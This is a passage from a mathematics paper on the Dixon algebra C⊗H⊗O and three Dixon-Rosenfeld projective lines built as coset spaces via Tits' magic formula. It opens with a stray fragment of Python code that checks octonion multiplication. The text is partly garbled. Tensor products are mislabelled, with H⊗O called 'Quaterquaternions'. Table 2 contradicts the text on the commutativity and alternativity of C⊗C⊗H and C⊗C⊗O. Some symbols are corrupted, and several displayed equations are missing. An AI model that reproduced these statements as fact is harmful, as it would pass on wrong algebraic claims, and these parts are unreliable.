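                           qmul(d, a) + qmul(b, qconj(c))])

rng = np.random.default_rng(0)
x, y, z = (rng.normal(size=8) for _ in range(3))

print(np.allclose(omul(x, y), omul(y, x)))                    # False: not commutative
print(np.allclose(omul(omul(x, y), z), omul(x, omul(y, z))))  # False: not associative
print(np.allclose(omul(x, omul(x, y)), omul(omul(x, x), y)))  # True: left alternative
print(np.allclose(omul(omul(x, y), y), omul(x, omul(y, y))))  # True: right alternative
```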
Since all four normed division algebras are vector spaces over the field of reals \(\mathbb{R}\) we are able to define a tensor product \(\mathbb{A}\otimes\mathbb{B}\) of two normed division algebras, with a bilinear product defined by \[\left(a\otimes b\right)\left(c\otimes d\right)=ac\otimes bd, \tag{3}\] where \(a,c\in\mathbb{A}\) and \(b,d\in\mathbb{B}\). The resulting tensor products are well known tensor algebras called \(\mathbb{C}\otimes\mathbb{C}\)_Bicomplex_, \(\mathbb{C}\otimes\mathbb{H}\)_Biquaternions_, \(\mathbb{H}\otimes\mathbb{O}\)_Quaterquaternions_, \(\mathbb{C}\otimes\mathbb{O}\)_Bicotenions_, \(\mathbb{H}\otimes\mathbb{O}\)_Quateroctonions_ and \(\mathbb{O}\otimes\mathbb{O}\)_Octooctonions_. By the definition of the product, it is clear that all algebras involving the Octonions are not associative. Moreover, while Bioctonions \(\mathbb{C}\otimes\mathbb{O}\) is an alternative algebra, Quateroctonions \(\mathbb{H}\otimes\mathbb{O}\) and Octooctonions \(\mathbb{O}\otimes\mathbb{O}\) are not alternative nor power-associative. Every alternative algebra tensor a commutative algebra yields again to an alternative algebra, so that with few additional efforts we can easily find all properties fo triple tensor products listed in Table (2). ### The Dixon algebra The _Dixon Algebra_\(\mathbb{T}\) is the \(\mathbb{R}\)-linear tensor product of the four normed division algebras, i.e. \(\mathbb{R}\otimes\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) or equivalently \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), with linear product defined by \[\left(z\otimes q\otimes w\right)\left(z^{\prime}\otimes q^{\prime}\otimes w^{ \prime}\right)=zz^{\prime}\otimes qq^{\prime}\otimes ww^{\prime}, \tag{4}\] with \(z,z^{\prime}\in\mathbb{C}\), \(q,q^{\prime}\in\mathbb{H}\) and \(w,w^{\prime}\in\mathbb{O}\). From the previous formula it is evident that \(\mathbb{T}\) is unital with unit element \(\mathbf{1}=1\otimes 1\otimes 1.\) As a real vector space, the Dixon Algebra has an \(\mathbb{R}^{64}\) decomposition for which every element \(t\) is of the form \[t= \sum_{\alpha=0}^{63}\,t^{\alpha}\,\,\,z\otimes q\otimes w, \tag{5}\] where \(t^{\alpha}\in\mathbb{R}\), and \(z,q,w\) are elements of a basis for \(\mathbb{C}\), \(\mathbb{H}\), \(\mathbb{O}\) respectively, i.e. \(z\in\{1,I\}\), \(q\in\{1,i,j,k\}\) and \(w\in\{1,e_{1},...,e_{7}\}\) with \[I^{2} =i^{2}=j^{2}=k^{2}=e_{\alpha}^{2}=-1, \tag{6}\] \[\left[I\,,i\right] =\left[I\,,j\right]=\left[I\,,k\right]=\left[I\,,e_{\alpha}\right] =0,\] (7) \[\left[e_{\alpha},i\right] =\left[e_{\alpha},j\right]=\left[e_{\alpha},k\right]=0, \tag{8}\] and the other rules of multiplication given in Fig. (1). \begin{table} \begin{tabular}{|c|c|c|c|c|c|} \hline Algebra & Comm. & Ass. & Alter. & Flex. & Pow. Ass. 
\\ \hline \hline \(\mathbb{C}\otimes\mathbb{C}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{O}\) & No & No & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{O}\) & No & No & No & No & No \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{C}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{H}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{O}\) & No & No & No & No & No \\ \hline \end{tabular} \end{table} Table 2: Commutativity, associativity, alternativity, flexibility and power associativity of two and three tensor products of normed division algebras \(\mathbb{R}\), \(\mathbb{C}\), \(\mathbb{H}\) and \(\mathbb{O}\) are shown. The split version of the algebras obeys the same property of the division version. \begin{table} \begin{tabular}{|c|c|c|c|c|c|c|} \hline Algebra & Ord. & Comm. & Ass. & Alter. & Flex. & Pow. Ass. \\ \hline \hline \(\mathbb{R}\) & Yes & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\) & No & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\) & No & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{O}\) & No & No & No & Yes & Yes & Yes \\ \hline \end{tabular} \end{table} Table 1: Ordinality, commutativity, associativity, alternativity, flexibility, and power associativity are summarized for the division algebras. It is straightforward to see that every element in the set \[D=\left\{\left(I\,q\pm 1\right),\left(I\,e_{\alpha}\pm 1\right),\ \left(gc_{\alpha}\pm 1 \right):q\in\left\{i,j,k\right\}\right\}, \tag{9}\] is a _zero divisor_ and therefore \(\mathbb{T}\) is not a division algebra. Moreover, the Dixon algebra is not commutative, neither associative, nor alternative or flexible and, finally, not even power-associative, i.e. in general \(x\left(xx\right)\neq\left(xx\right)x\). Nevertheless, it is possible to define a a quadratic norm \(N\) over \(\mathbb{T}\), starting from the decomposition in Eq. (5), i.e. \[N\left(t\right)=\!\!\sum_{\alpha=0}^{63}\left(t^{\alpha}\right)^{2}, \tag{10}\] with an associated _polar form_\(\left\langle\cdot,\cdot\right\rangle\) given by the symmetric bilinear form \[2\left\langle t_{1},t_{2}\right\rangle=N\left(t_{1}+t_{2}\right)-N\left(t_{1} \right)-N\left(t_{2}\right). \tag{11}\] ## II Dixon-Rosenfeld lines The geometrical motivation for defining Dixon-Rosenfeld lines as coset manifolds relies on the study of the octonionic planes explored by Tits, Freudenthal and Rosenfeld in a series of seminal works [11, 12, 13, 14] that led to a geometric interpretation of Lie algebras and to the construction of the Tits-Freudenthal Magic Square. While Freudenthal interpreted the entries of the Magic Square as different forms of automorphisms of the projective plane such as isometries, collineations, homography etc., Rosenfeld thought of every row of the magic square as the Lie algebra of the isometry groups of a "generalized" projective plane over a tensorial product of Hurwitz algebras [14] (see also [MCCAI] for a recent systematic review). In fact, tensor products over Hurwitz algebras are not division algebras, which therefore do not allow the definition of a projective plane in a strict sense. 
Nevertheless, later works of Atsuyama proved the insight of Rosenfeld to be correct and that it is possible to use these algebras to define projective planes in a "wider sense" [15, 16]. A similar analisys was then carried out for generalized projective lines making use the Tits-Freudenthal Magic Square of order two instead of three, thus relating the resulting Lie algebras with isometries of generalized projective lines, instead of planes (see [12], for more details). ### Dixon lines as coset manifold _Coset manifolds_ arise from coset spaces over a Lie group \(G\) given by an equivalence relation of the type \[g\sim g^{\prime}\Longleftrightarrow gh=g^{\prime}, \tag{12}\] where \(g,g^{\prime}\in G\) and \(h\in H\) and \(H\) is a closed subgroup of \(G\). In this case, the coset space \(G/H\), obtained from the equivalence classes \(gH\), inherits a manifold structure from \(G\) and is therefore a manifold of dimension \[\dim\left(G/H\right)=\dim\left(G\right)-\dim\left(H\right). \tag{13}\] Moreover, \(G/H\) can be endowed with invariant metrics such that all elements of the original group \(G\) are isometries of the constructed metric [17, MCCAI]. More specifically, the structure constants of the Lie algebra \(\mathfrak{g}\) of the Lie group \(G\) define completely the metric and therefore all the metric-dependent tensors, such as the curvature tensor, the Ricci tensor, etc. Finally, the coset space \(G/H\) is a homogeneous manifold by construction, i.e. the group \(G\) acts transitively, and its _isotropy subgroup_ is precisely \(H\), i.e. the group \(H\) is such that for any given point \(p\) in the manifold \(hp=p\). Therefore, for our purposes in the definition of the Dixon-Rosenfeld lines, it will be sufficient to define the isometry group and the isotropy group of the coset manifold to have them completely defined in its topological and metrical descriptions. ### Tits' magic formula We now proceed defining three Dixon projective lines as three different coset spaces of real dimension \(64\) obtained from three isometry algebras \(\mathfrak{a}_{I}\), \(\mathfrak{a}_{II}\) and \(\mathfrak{a}_{III}\) making the use of Tits' magic formula for \(n=2\), i.e. \[\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)=\mathfrak{ acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{J}_{2} \left(\mathbb{B}\right)\right)\oplus\left(\mathbb{A}^{\prime}\otimes \mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\right), \tag{14}\] where \(\mathbb{A},\mathbb{B}\) are alternative algebras and \(\mathfrak{J}_{2}\left(\mathbb{B}\right)\) is a Jordan algebra over Hermitian two by two matrices [Ti]. Brackets on \(\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)\) can be defined following notation in [2, sec. 3] for which, given the an algebra \(\mathbb{A}\), we define \[X^{\prime}=X-\frac{1}{2}\mathrm{Tr}\left(X\right)\mathbf{1}, \tag{15}\] as the projection of an element of the algebra in the subspace orthogonal to the identity denoted as \(\mathbf{1}\). We then define \(\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\) the algebra obtained by such elements with the product \(\bullet\) given by the projection back on the subspace orthogonal to the identity of the Jordan product, i.e. 
\[X^{\prime}\bullet Y^{\prime}=X^{\prime}\cdot Y^{\prime}-2\left\langle X^{ \prime},Y^{\prime}\right\rangle\mathbf{1}, \tag{16}\] where, as usual we intended \(X\cdot Y=XY+YX\) and \(\left\langle X,Y\right\rangle=\nicefrac{{1}}{{2}}\mathrm{Tr}\left(X\cdot Y\right)\) for every \(X,Y\in\mathfrak{J}_{2}\left(\mathbb{B}\right)\). With this notation, the vector space \[\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)=\mathfrak{ acr}\left(\mathbb{A}\right)\oplus\mathfrak{ acr}\left(\mathfrak{J}_{2}\left(\mathbb{B}\right)\right)\oplus\left(\mathbb{A}^{ \prime}\otimes\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\right), \tag{17}\] is endowed with the following brackets 1. The usual brackets on the Lie subalgebra \(\mathfrak{acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{J}_ {2}\left(\mathbb{B}\right)\right)\). 2. When \(a\in\mathfrak{acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{ J}_{2}\left(\mathbb{B}\right)\right)\) and \(A\in\mathbb{A}^{\prime}\otimes\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\) then \[\left[a,A\right]=a\left(A\right).\] (18) 3. When \(a\otimes A,b\otimes B\in\mathbb{A}^{\prime}\otimes\mathfrak{J}_{2}^{\prime} \left(\mathbb{B}\right)\) then \[\left[a\otimes A,b\otimes B\right]=\frac{1}{2}\left\langle A,B\right\rangle D_ {a,b}-\left\langle a,b\right\rangle\left[L_{A},L_{B}\right]+\frac{1}{2}\left[a, b\right]\otimes\left(A\bullet B\right),\] (19) where \(L_{x}\) and \(R_{x}\) are the left and right action on the algebra and \(D_{x,y}\) is given by \[D_{x,y}=\left[L_{x},L_{y}\right]+\left[L_{x},R_{y}\right]+\left[R_{x},R_{y} \right].\] (20) ### Three isometry groups Tits' formula is the most general formula compared to those of Vinberg [18], Atsuyama [Ats], Santander and Herranz [SH], Barton and Sudbury [2], and Elduque [1] since it does not require the use of two composition algebras, but only the use of an alternative algebra and a Jordan algebra obtained from another alternative algebra. By the associativity and commutativity of the tensor product, we now consider all possible product of the form \(\mathbb{A}\otimes\mathbb{B}\) that yield to the Dixon algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) requiring alternativity on \(\mathbb{A}\) and \(\mathbb{B}\). Since \(\mathbb{H}\otimes\mathbb{O}\) is not alternative, the possible candidates can be _a priori_ only related with the following four different \(\mathbb{A}\) and \(\mathbb{B}\), i.e. \[I:\mathbb{A} =\left(\mathbb{C}\otimes\mathbb{H}\right),\mathbb{B}=\mathbb{O}, \tag{21}\] \[II:\mathbb{A} =\mathbb{O},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{H}\right),\] (22) \[III:\mathbb{A} =\left(\mathbb{C}\otimes\mathbb{O}\right),\mathbb{B}=\mathbb{H}, \tag{23}\] and, finally, \(\mathbb{A}=\mathbb{H},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{O}\right).\) However the latter case, i.e. \(\mathbb{A}=\mathbb{H},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{O}\right)\), would need the existence of a Jordan algebra \(\mathfrak{J}_{2}\left(\mathbb{C}\otimes\mathbb{O}\right)\) over Biotonions \(\mathbb{C}\otimes\mathbb{O}\), which is not possible if we want to consider real elements as symmetric part of the involution, i.e. real coefficients on the diagonal.[81] We are therefore left with only three different possibilities, i.e. 
\[\mathfrak{a}_{I} =\mathcal{L}_{2}\left(\mathbb{C}\otimes\mathbb{H},\mathbb{O} \right),\] \[\mathfrak{a}_{II} =\mathcal{L}_{2}\left(\mathbb{O},\mathbb{C}\otimes\mathbb{H} \right), \tag{24}\] \[\mathfrak{a}_{III} =\mathcal{L}_{2}\left(\mathbb{C}\otimes\mathbb{O},\mathbb{H} \right).\] 1. In the case \(\mathbb{A}=\mathbb{C}\otimes\mathbb{H}\) and \(\mathbb{B}=\mathbb{O}\), the vector space is given by where \(\left(\mathbb{C}\otimes\mathbb{H}\right)^{\prime}\otimes\mathfrak{J}_{2}^{ \prime}\left(\mathbb{O}\right)\) can be intended as the representation \(\left(\mathbf{7},\mathbf{9}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\). The Lie algebra \(\mathfrak{a}_{I}\) has therefore real dimension \(3+36+63=102\). 2. In the case \(\mathbb{A}=\mathbb{O}\) and \(\mathbb{B}=\mathbb{C}\otimes\mathbb{H}\), we have the real vector space where \(\mathbb{O}^{\prime}\otimes\mathfrak{J}_{2}^{\prime}(\mathbb{C}\otimes\mathbb{ H})\) can be intended as the \(\left(\mathbf{7},\mathbf{2}\cdot\mathbf{7}+\mathbf{1}\right)\) of \(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\). The Lie algebra \(\mathfrak{a}_{II}\) has real dimension \(21+3+64=88\). 3. Finally, in the case \(\mathbb{A}=\mathbb{C}\otimes\mathbb{O}\) and \(\mathbb{B}=\mathbb{H}\), Tits' construction yields to the real vector space where \(\left(\mathbb{C}\otimes\mathbb{O}\right)^{\prime}\otimes\mathfrak{J}_{2}^{ \prime}\left(\mathbb{H}\right)\) can be intended as the \(\left(\mathbf{7}+\mathbf{7}+\mathbf{1},\mathbf{5}\right)\) of \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\). The Lie algebra \(\mathfrak{a}_{3}\) has dimension \(14+10+75=99\). ### Three Dixon lines A Dixon-Rosenfeld line \(\mathbb{T}P^{1}\) can be realized as an homogeneous space of dimension \(\dim_{\mathbb{R}}\mathbb{T}P^{1}=\dim_{\mathbb{R}}\mathbb{T}=64\), whose Lie algebra \(\mathfrak{Lie}\left(\mathbb{T}P^{1}\right)\) relates to the isometry and isotropy Lie algebras as follows: \[\mathfrak{Lie}\left(\mathbb{T}P^{1}\right)\simeq\mathfrak{isom}\left( \mathbb{T}P^{1}\right)\ominus\mathfrak{isot}\left(\mathbb{T}P^{1}\right), \tag{28}\] and whose tangent space \(T\left(\mathbb{T}P^{1}\right)\) carries a \(\mathfrak{isot}\left(\mathbb{T}P^{1}\right)\)-covariant realization of \(\mathbb{T}\) itself. We will now discuss how, due to the three possible cases in Eq. (24), there exist three "homogeneous realizations" of the Dixon-Rosenfeld projective line \(\mathbb{T}P^{1}\), which will be distinguished by the subscript \(I\), \(II\) and \(III\), respectively. The first case is with isometry Lie algebra given by \[\mathfrak{a}_{I}=\mathfrak{isom}\left(\mathbb{T}P^{1}_{I}\right)=\mathfrak{su} _{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right). \tag{29}\] \begin{table} \begin{tabular}{|c|c|c|c|} \hline & \(\mathbb{T}P^{1}_{I}\) & \(\mathbb{T}P^{1}_{II}\) & \(\mathbb{T}P^{1}_{III}\) \\ \hline \hline isom & \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right)\) & \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{2}\oplus\left(\mathbf{7},\mathbf{2}\cdot \mathbf{7}+\mathbf{1}\right)\) & \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\left(\mathbf{7}+\mathbf{7}+ \mathbf{1},\mathbf{5}\right)\) \\ \hline isot & \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{7},\mathbf{1} \right)\oplus\left(\mathbf{1},\mathbf{7}\right)\) & \(\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\) & \(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\left(\mathbf{2}\cdot\mathbf{7}+ \mathbf{1},\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{3}\right)\) \\ \hline Real. 
\(\mathbb{T}\) & \(\left(\mathbf{7}+\mathbf{1},\mathbf{7}+\mathbf{1}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}\) & \(\left(\mathbf{7}+\mathbf{1},\mathbf{7}+\mathbf{1}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{2}\) & \(2\cdot\left(\mathbf{7}+\mathbf{1},\mathbf{3}+\mathbf{1}\right)\) of \(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\) \\ \hline \end{tabular} \end{table} Table 3: Isometry algebra, isotropy algebra and covariant realization of \(\mathbb{T}\) itself in the three Dixon-Rosenfeld lines. By iterated branchings of \(\mathfrak{a}_{I}\), one obtains \[\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus(\mathbf{7},\mathbf{9}) =\mathfrak{su}_{2}\oplus\mathfrak{so}_{8}\oplus(\mathbf{7}, \mathbf{8}_{v}+\mathbf{1})\oplus(\mathbf{1},\mathbf{8}_{v})\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus(\mathbf{7}, \mathbf{7}+\mathbf{1}+\mathbf{1})\oplus(\mathbf{1},2\cdot\mathbf{7}+\mathbf{1})\] \[=\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}\oplus(\mathbf{7}, \mathbf{7}+\mathbf{1}+\mathbf{1})\oplus(\mathbf{1},3\cdot\mathbf{7}+\mathbf{1}) \tag{30}\] \[\simeq\mathfrak{iso}\left(\mathbb{T}P_{I}^{1}\right)\oplus T\left( \mathbb{T}P_{I}^{1}\right),\] where the covariant realization of \(\mathbb{T}\) is given by \[\mathbb{T}\mathbb{T}\mathbb{T}P_{I}^{1}\simeq\left(\mathbf{7}+\mathbf{1}, \mathbf{7}+\mathbf{1}\right)\text{ of }\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}. \tag{31}\] We thus have that the isotropy Lie algebra is given by \[\mathfrak{iso}\left(\mathbb{T}P_{I}^{1}\right)\simeq\mathfrak{su} _{2}\oplus\mathfrak{g}_{2}\oplus(\mathbf{7},\mathbf{1})\oplus 2\cdot(\mathbf{1}, \mathbf{7}) \tag{32}\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus(\mathbf{7}, \mathbf{1})\oplus(\mathbf{1},\mathbf{7})\,,\] therefore yielding to the following characterization of the Dixon projective line \(\mathbb{T}P_{I}^{1}\) as a homogeneous space, i.e. \[\mathbb{T}P_{I}^{1}\simeq\frac{SU_{2}\times SO_{9}\ltimes(\mathbf{7},\mathbf{ 9})}{SU_{2}\times SO_{7}\ltimes((\mathbf{7},\mathbf{1})\times(\mathbf{1}, \mathbf{7}))}. \tag{33}\] As simple check on dimension, we indeed have that \(\dim_{\mathbb{R}}\mathbb{T}P_{I}^{1}=3+36+63-3-21-14=64\), which indeed is equal to \(\dim_{\mathbb{R}}\mathbb{T}\) as expected. The second case is slightly different since the Lie algebra \[\mathfrak{a}_{II}=\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)=\mathfrak{g} _{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7},2\cdot\mathbf{7}+\mathbf{1}) \tag{34}\] does not contain \(\mathbb{T}\) and, therefore, it must necessarily be enhanced at least by the set \((\mathbf{1},\mathbf{7}+\mathbf{1})\) of coset generators such that \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}} :=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7},2 \cdot\mathbf{7}+\mathbf{1})\oplus(\mathbf{1},\mathbf{7}+\mathbf{1}) \tag{35}\] \[\simeq\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7}, \mathbf{1})\oplus\mathbb{T}=\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus \mathbb{T}. \tag{36}\] Thus, from the (minimally) enhanced \(\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}}\) one easily obtains \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}}\simeq\mathfrak{iso }\left(\mathbb{T}P_{II}^{1}\right)\oplus T\left(\mathbb{T}P_{II}^{1}\right), \tag{37}\] yielding to the following isotropy Lie algebra \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)\simeq\mathfrak{g}_{2}\oplus \mathfrak{su}_{2}\oplus(\mathbf{7},\mathbf{1})=\mathfrak{so}_{7}\oplus \mathfrak{su}_{2}. 
\tag{38}\] We then have the following characterization of the Dixon projective line \(\mathbb{T}P_{II}^{1}\) as a homogeneous space given by \[\mathbb{T}P_{II}^{1}\simeq\frac{SO_{7}\times SU_{2}\ltimes(\mathbf{7}+ \mathbf{1},\mathbf{7}+\mathbf{1})}{SO_{7}\times SU_{2}}. \tag{39}\] As simple check on dimension, we indeed have that \(\dim_{\mathbb{R}}\mathbb{T}P_{II}^{1}=21+3+64-3-21=64\), which indeed is equal to \(\dim_{\mathbb{R}}\mathbb{T}\) as expected. Finally, as for the third case the isometry Lie algebra is given by \[\mathfrak{a}_{III}=\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)=\mathfrak{g} _{2}\oplus\mathfrak{so}_{5}\oplus(\mathbf{7}+\mathbf{7}+\mathbf{1},\mathbf{ 5})\,. \tag{40}\] By iterated branchings of \(\mathfrak{a}_{III}\), one obtains \[\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus(2\cdot\mathbf{7}+ \mathbf{1},\mathbf{5}) =\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \oplus(\mathbf{1},\mathbf{2},\mathbf{2})\oplus(2\cdot\mathbf{7}+\mathbf{1}, \mathbf{2},\mathbf{2})\oplus(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1},\mathbf{ 1})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2,d}\oplus 2\cdot(\mathbf{1}, \mathbf{3})\oplus(\mathbf{1},\mathbf{1})\oplus(2\cdot\mathbf{7}+\mathbf{1}, \mathbf{3})\oplus 2\cdot(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1}) \tag{41}\] \[\simeq\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)\oplus T \left(\mathbb{T}P_{III}^{1}\right), \tag{42}\] thus yielding [82] an isotropy Lie algebra given by \[\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)\simeq\mathfrak{g}_{2}\oplus \mathfrak{su}_{2}\oplus(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1})\oplus( \mathbf{1},\mathbf{3})\,, \tag{43}\] and therefore to the following characterization of the Dixon projective line \(\mathbb{T}P^{1}_{III}\) as a homogeneous space: \[\mathbb{T}P^{1}_{III}\simeq\frac{G_{2}\times SO_{5}\ltimes(2\cdot \boldsymbol{7}+\boldsymbol{1},\boldsymbol{5})}{G_{2}\times SU_{2}\ltimes((2 \cdot\boldsymbol{7}+\boldsymbol{1},\boldsymbol{1})\times(\boldsymbol{1}, \boldsymbol{3}))}, \tag{44}\] where, again the dimensional check gives us back \[\dim_{\mathbb{R}}\mathbb{T}P^{1}_{III}=14+10+75-14-3-18=64=\dim_{\mathbb{R}} \mathbb{T}. \tag{45}\] **Remark**. Since the covariant realization of \(\mathbb{T}\) in the first two cases is equal, it seems logical to investigate mutual relationship between Dixionian lines. We have a direct embedding of \(\mathbb{T}P^{1}_{II}\) in \(\mathbb{T}P^{1}_{I}\) since \[\mathfrak{isom}\left(\mathbb{T}P^{1}_{I}\right) \simeq\mathfrak{so}_{9}\oplus\mathfrak{su}_{2}\oplus(\boldsymbol{ 9},\boldsymbol{7})=\mathfrak{so}_{8}\oplus\mathfrak{su}_{2}\oplus( \boldsymbol{8}_{v}+\boldsymbol{1},\boldsymbol{7})\oplus(\boldsymbol{8}_{v}, \boldsymbol{1})\] \[=\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus(\boldsymbol{7} +2\cdot\boldsymbol{1},\boldsymbol{7})\oplus(2\cdot\boldsymbol{7}+\boldsymbol {1},\boldsymbol{1})\] \[=\mathfrak{isom}\left(\mathbb{T}P^{1}_{II}\right)\oplus( \boldsymbol{7},\boldsymbol{1})\oplus(\boldsymbol{1},\boldsymbol{7})\,. \tag{46}\] On the other hand, from a comparison of the corresponding isometries, it is immediate to establish that are no possible embeddings between \(\mathbb{T}P^{1}_{III}\) and \(\mathbb{T}P^{1}_{I}\) or \(\mathbb{T}P^{1}_{II}\). ## III Relationship with octonionic Rosenfeld lines It is interesting to point out the relationship between the Dixon-Rosenfeld lines and the other octonionic Rosenfeld lines, whose definition can be found in from an historical point of view in [11, 12] and in a more rigorous definition in [10]. 
Let us just recall here the homogeneous space realization of Rosenfeld lines over \(\mathbb{A}\otimes\mathbb{O}\), with \(\mathbb{A}=\mathbb{R},\mathbb{C},\mathbb{H},\mathbb{O}\) (see [11, 12, 13] and [10], i.e. for the _octonionic projective line_\((\mathbb{R}\otimes\mathbb{O})\,P^{1}\), the _bioctonionic Rosenfeld line_\((\mathbb{C}\otimes\mathbb{O})\,P^{1}\), the _quateroctonionic Rosenfeld line_\((\mathbb{H}\otimes\mathbb{O})\,P^{1}\) and, finally, for the _octoocationic Rosenfeld line_\((\mathbb{O}\otimes\mathbb{O})\,P^{1}\): \[\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{9}}{SO_{8}}\simeq S^{8},\] \[\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{10}\times U_{1}}{SO_{8}\times U_{1}\times U_{1}}\simeq \frac{SO_{10}}{SO_{8}\times U_{1}},\] \[\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{12}\times Sp_{2}}{SO_{8}\times SU_{2}\times Sp_{2}} \simeq\frac{SO_{12}}{SO_{8}\times SU_{2}\times SU_{2}},\] \[\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{16}}{SO_{8}\times SO_{8}},\] from which it consistently follows that \[T\left(\mathbb{O}P^{1}\right) \simeq \boldsymbol{8}_{v}\text{ of }\mathfrak{so}_{8} \tag{47}\] \[\simeq \boldsymbol{7}+\boldsymbol{1}\text{ of }\mathfrak{so}_{7}\] \[\simeq \boldsymbol{7}+\boldsymbol{1}\text{ of }\mathfrak{g}_{2},\] \[T\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq \boldsymbol{8}_{v,+}\oplus\boldsymbol{8}_{v,-}\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{u}_{1} \tag{48}\] \[\simeq 2\cdot\left(\boldsymbol{7}+\boldsymbol{1}\right)\text{ of } \mathfrak{so}_{7}\] \[\simeq 2\cdot\left(\boldsymbol{7}+\boldsymbol{1}\right)\text{ of } \mathfrak{g}_{2},\] \[T\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq \left(\boldsymbol{8}_{v},\boldsymbol{2},\boldsymbol{2}\right)\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \tag{49}\] \[\simeq \left(\boldsymbol{8}_{v},\boldsymbol{3}+\boldsymbol{1}\right) \text{ of }\mathfrak{so}_{8}\oplus\mathfrak{su}_{2,d}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{3}+\boldsymbol{1 }\right)\text{ of }\mathfrak{g}_{2}\oplus\mathfrak{su}_{2},\] \[T\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq \left(\boldsymbol{8}_{v},\boldsymbol{8}_{v}\right)\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{so}_{8} \tag{50}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{7}+\boldsymbol{1 }\right)\text{ of }\mathfrak{so}_{7}\oplus\mathfrak{so}_{7}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{7}+\boldsymbol{1 }\right)\text{ of }\mathfrak{g}_{2}\oplus\mathfrak{g}_{2}.\] which illustrates how the tangent spaces of octonionic projective lines 